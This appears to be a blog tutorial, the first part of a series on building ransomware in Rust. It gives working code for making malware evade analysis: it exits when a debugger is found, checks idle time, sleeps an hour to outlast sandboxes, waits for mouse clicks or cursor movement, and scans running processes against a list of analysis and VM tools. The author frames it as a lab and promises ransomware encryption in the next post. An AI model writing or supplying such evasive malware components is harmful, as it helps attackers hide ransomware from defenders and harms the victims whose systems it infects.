Rust Ransomware | Part 1
Setting up & Implementing Anti-Rerversing techniques in malwares
Set up
- To set up this lab, please make sure you have a recent version of Rust installed.
- Create a folder on your computer and change into that directory from your Command Prompt
cd folder
cargo init
You should see a few files and folders created like below
- The src folder is where you should put your Rust codes in for the malware.
- The target folder is where you can find the products of your code after building it (The .exe file for the malware,…)
- Cargo.toml is a file where you can specify the dependencies that your code might need (it’s similar to import in python)
Before starting, append this to your Cargo.toml file. Inside the features array, we can include the crates that we use from Rust-Winapi. For example, if I want to use Winduser.h on Windows, I can import it as below
winapi = { version = "0.3", features = ["winuser"] }
Anti-Reversing techniques
I. IsDebuggerPresent
IsDebuggerPresent is a cool WinAPI function used to check for the BeingDebugged flag in the PEB (Process Environment Block) and will return a non-zero value if it is indeed being debug.
In theory, if this functions returns a non-zero value, the malware should exit immediately instead of executing its behavior to prevent reverse engineers from being able to run it with a debugger attached
You can read more about the documentation here
This is what the documentation from Rust Winapi looks like
If you trace down the type of the returned variable (BOOL), you will find that BOOL is just a wrapper for i32 in Rust!
At this point, we’re ready to try it out in!
First, since IsDebuggerPresent is from the winapi::um::debugapi crate, we need to import it in Cargo.toml.
winapi = { version = "0.3", features = ["debugapi"}
- After that, we can lay it out in
#[cfg(windows)] extern crate winapi; use winapi::um::debugapi::IsDebuggerPresent; fn main() { unsafe { match IsDebuggerPresent() { 0 => { println!("Debugger is not present... Continue"); }, _ => { println!("Debugger is present... Terminating. Code {}", IsDebuggerPresent()); std::process::exit(0); } } } println!("Hello, world!"); loop {} }
First, we check if IsDebuggerPresent() returns a 0 or any other number. If it’s 0, the program is not being debugged, so we continue to print “Hello, world!”
If it’s being debugged, we print the debug code out and call std::process::exit(0) to exit immediately!
Here is the result:
- Double clicking on the executable /target/debug/Rust-Ransomware.exe. As you can see, the program prints out “Hello, world!”
- Debugging this executable in IDA, we can set a break point where we compare eax(the return value from IsDebuggerPresent()). If we execute to this point, you can see that eax = 1, so we will exit immediately!
There are some ways that reverse engineers can bypass this through dynamic patching or static patching the executable itself, and we can do more things to make our executable anti-patching.
Since I’m a bit lazy, I’m not going to attempt this, but maybe we can come back for this another time!
II. Check for sandbox
There are a variety of sandbox-evasion techniques. I’m just going to list out a few of them for us to try and implement down here.
If you are interested in more details, I suggest taking a look at this research paper
1. Timing-based techniques
Idle time: The normal idle time on your PC or mine is typically really really short when we are using them. It’s around 0.047 seconds on my laptop currently. For a sandbox, there won’t be much action happening, and their idle time is typically really long.
We can check and see if the idle time is over a minute. If it is, we are probably in a sandbox
use winapi::um::sysinfoapi::GetTickCount; use winapi::um::winuser::{GetLastInputInfo, LASTINPUTINFO}; pub fn check_idle_time() -> bool { unsafe { let mut last_input_info: LASTINPUTINFO = LASTINPUTINFO { cbSize: std::mem::size_of::<LASTINPUTINFO>() as u32, dwTime: 0u32, }; GetLastInputInfo(&mut last_input_info); let idle_time: u32 = (GetTickCount() - last_input_info.dwTime) / 1000; if idle_time >= 60 { return true; } return false; } }
The idle time can be calculated by subtracting the time of the last input event(GetLastInputInfo) from the time since the system was started(GetTickCount).
For GetLastInputInfo, it takes in a pointer to a LASTINPUTINFO struct according to MSDN. Therefore, we have to create the struct and put a 0u32 into dwTime field. After calling GetLastInputInfo, the system will write into this u32 the time of the last input event!
Try calling this function in main() and you will see that the idle_time is typically 0 or 1 on your system.
Logic bomb/sleep: By implementing our malware as a logic bomb, we can stall the execution of the malware and have it sleeps.
Typically, a sandbox analyzes a malware in around 10-20 minutes, we can just go to sleep for a couple of hours and wake up after the sandbox’s processing time!
We also can make our malware execute at a specific date and time in the future, defeating the sandbox by waiting it out!
Since this does not need to be too complicated, I just let my malware sleep for an hour before executing anything.
use winapi::um::synchapi::Sleep; pub fn sleep_for_an_hour() { unsafe { Sleep(3600000) } }
2. Detecting user interaction
Usually, users interact with their computers through mouse clicks and the keyboard, but there is extremly unlikely that there is such human-like interactions in a sandbox.
We can make our malware wait for a certain user interactions before executing. The Trojan.APT.BaneChan sits and waits for a number of mouse clicks before executing its malicious code. I figure we can use this trick!
use winapi::um::winuser::{GetAsyncKeyState, VK_RBUTTON}; pub fn check_mouse_click(min_clicks: u32) { let mut count: u32 = 0; while count < min_clicks { let key_left_clicked = unsafe { GetAsyncKeyState(VK_RBUTTON) }; if key_left_clicked >> 15 == -1 { count += 1; } unsafe { Sleep(100) }; } }
We can also check the position of the mouse. Since a sandbox does not move the mouse cursor around, we can record the original position, wait for 5 seconds, and record it again. If the mouse position matches exactly, it’s highly possible that we are in a sandbox
use winapi::um::winuser::{GetCursorPos}; use winapi::shared::windef::POINT; pub fn check_cursor_position() -> bool { let mut cursor: POINT = POINT { x: 0i32, y: 0i32 }; unsafe { GetCursorPos(&mut cursor); let x = cursor.x; let y = cursor.y; Sleep(5000); GetCursorPos(&mut cursor); if x == cursor.x && y == cursor.y { return false; } } true }
3. Running Processes and Services:
Usually, a sandbox has multiple antivirus programs, debuggers, monitoring programs running as active processes. Our malware can check for the availability of some of these to determine if it’s being ran in a sandbox
In my code, I looked up how to numerate all running processes from MSDN and translate their C++ code into Rust.
Then I extract their names and compare them with a list of executable names that usually exists in sandbox environment.
pub fn check_process() -> bool { let mut a_processes: Vec<u32> = Vec::with_capacity(1024); let mut i = 0; while i < 1024 { a_processes.push(0u32); i += 1; } let mut cb_needed: u32 = 0u32; let mut _c_processes: u32 = 0u32; if unsafe { EnumProcesses(a_processes.as_ptr() as *mut u32, 1024 * 4, &mut cb_needed) } == 0 { return false; } // Calculate how many process identifiers were returned. _c_processes = cb_needed / 4; let mut current_processes: Vec<String> = Vec::new(); let mut count = 0; while count < _c_processes { if a_processes[count as usize] != 0 { let process_name = print_process_name_and_id(a_processes[count as usize]); if process_name.len() != 0 { current_processes.push(process_name); } } count += 1; } let sandbox_processes = [ "vmsrvc.exe", "tcpview.exe", "wireshark.exe", "fiddler.exe", "vmware.exe", "VirtualBox.exe", "procexp.exe", "autoit.exe", "vboxtray.exe", "vmtoolsd.exe", "vmrawdsk.sys.", "vmusbmouse.sys.", "df5serv.exe", "vboxservice.exe", ] .to_vec(); let mut found_processes: Vec<&str> = Vec::new(); for process in current_processes.iter() { for sandbox_process in sandbox_processes.iter() { if &(process.to_lowercase()) == &(sandbox_process.to_lowercase()) { found_processes.push(sandbox_process); } } } if found_processes.len() != 0 { return false; } true } pub fn print_process_name_and_id(processID: u32) -> String { unsafe { let mut process_name: String = String::new(); let hProcess: HANDLE = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, processID); if hProcess != null_mut() { let mut hMod: HMODULE = null_mut(); let mut cb_needed: u32 = 0u32; if EnumProcessModules( hProcess, &mut hMod, std::mem::size_of::<HMODULE>() as u32, &mut cb_needed as *mut _ as *mut u32, ) == 0 { return String::new(); } let mut szProcessName: Vec<u16> = Vec::new(); let mut count = 0; while count < 20 { szProcessName.push(0u16); count += 1; } GetModuleBaseNameW(hProcess, hMod, szProcessName.as_ptr() as *mut u16, 20); count = 0; while szProcessName[count as usize] != 0 { count += 1; } process_name = String::from_utf16(&szProcessName[..count as usize]).unwrap(); } CloseHandle(hProcess); return process_name; } }
III. Recap
We have build the foundation for our malware today! Anti-Reversing is a cool step in malware development since you get to see about the attacker’s perspective to protect their own malware against reverse engineer!
Feel free to try out the code! You can find it at my Github
Next post, we will be looking into the ransomware’s encryption!
Thank you for reading, and see you next time!